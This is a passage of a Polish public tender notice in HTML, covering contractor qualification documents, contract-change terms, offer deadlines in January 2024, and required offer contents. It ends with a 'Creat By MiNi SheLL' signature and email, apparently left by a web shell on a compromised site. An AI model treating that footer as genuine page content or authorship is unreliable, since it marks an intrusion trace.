z podaniem ich wartości przedmiotu, dat wykonania i podmiotów na rzecz których usługi zostały wykonane oraz załączeniem dowodów określających czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie Wykonawcy. Z wykazu usług ma wynikać spełnienie warunku, o którym mowa w punkcie 5.2.4.1 (wzór wykazu usług stanowi załącznik nr 8 do SWZ).<br/>2)	wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usługi, kontrole jakości, wraz z informacjami na temat ich kwalifikacji, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacji o podstawie do dysponowania tymi osobami. Z wykazu osób ma wynikać spełnienie warunku, o którym mowa w punkcie 5.2.4.2 SWZ (wzór wykazu osób stanowi załącznik nr 9 do SWZ).</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. <br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w pkt. 7.1 SWZ, składa każdy z Wykonawców wspólnie ubiegających się. Oświadczenia te potwierdzają brak podstaw wykluczenia w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy (zgodnie z wzorem załącznika nr 6 do SWZ). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Wybrany Wykonawca jest zobowiązany do zawarcia umowy w sprawie zamówienia publicznego na warunkach określonych we Wzorze Umowy, stanowiącym Załącznik nr 3 do SWZ. <br/>2.	Zakres świadczenia Wykonawcy wynikający z umowy jest tożsamy z jego zobowiązaniem zawartym w ofercie.<br/>3.	Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 454-455 PZP oraz wskazanym we Wzorze Umowy, stanowiącym Załącznik nr 3 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-01-18 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/port</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-01-18 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-02-16</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">3</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> W przypadku podjęcia decyzji o przeprowadzeniu negocjacji Zamawiający działając na mocy art. 288 ust. 1 PZP ograniczy, stosując kryteria oceny ofert, liczbę Wykonawców zaproszonych do negocjacji trzech Wykonawców, których oferty spełniają w najwyższym stopniu te kryteria. Kryterium oceny ofert, tj. kryterium nr 1 cena, w ramach którego będą prowadzone negocjacje w celu ulepszenia treści ofert. <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Na zawartość oferty składa się:<br/>1) Wypełniony i podpisany Formularz ofertowy - wzór druku formularza stanowi załącznik nr 1 do SWZ;<br/>2) Wypełniony i podpisany formularz wyceny – załącznik nr 10 do SWZ;<br/>3) Wypełniony i podpisany wykaz osób dodatkowych – załącznik nr 11 do SWZ;<br/>4)	Wypełnione i podpisane oświadczenie, o którym mowa w pkt. 7.1. SWZ - wzór oświadczenie stanowi załączniki nr 4 do SWZ;<br/>5)	Stosowne pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio z właściwego rejestru (jeżeli dotyczy);<br/>6)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego (jeżeli dotyczy);<br/>7) Oświadczenie wykonawców wspólnie ubiegających się o udzielnie zamówienia, o którym mowa w punkcie 9.3. SWZ (jeżeli dotyczy), załącznik nr 6;<br/>8) Odpis lub informacja z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do reprezentowania.<br/>Wykonawca nie jest zobowiązany do złożenia wyżej wymienionych, jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskaże dane umożliwiające dostęp do tych dokumentów.<br/><br/>Z postępowania o udzielenie zamówienia wyklucza się Wykonawcę w przypadkach, o których mowa w art. 7 ust. 1 ustawy z dnia 14 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. 2023 r., poz. 1497 z późn. zm.). Do Wykonawcy podlegającego wykluczeniu w tym zakresie, stosuje się art. 7 ust. 3 wspomnianej ustawy.

Creat By MiNi SheLL
Email: jattceo@gmail.com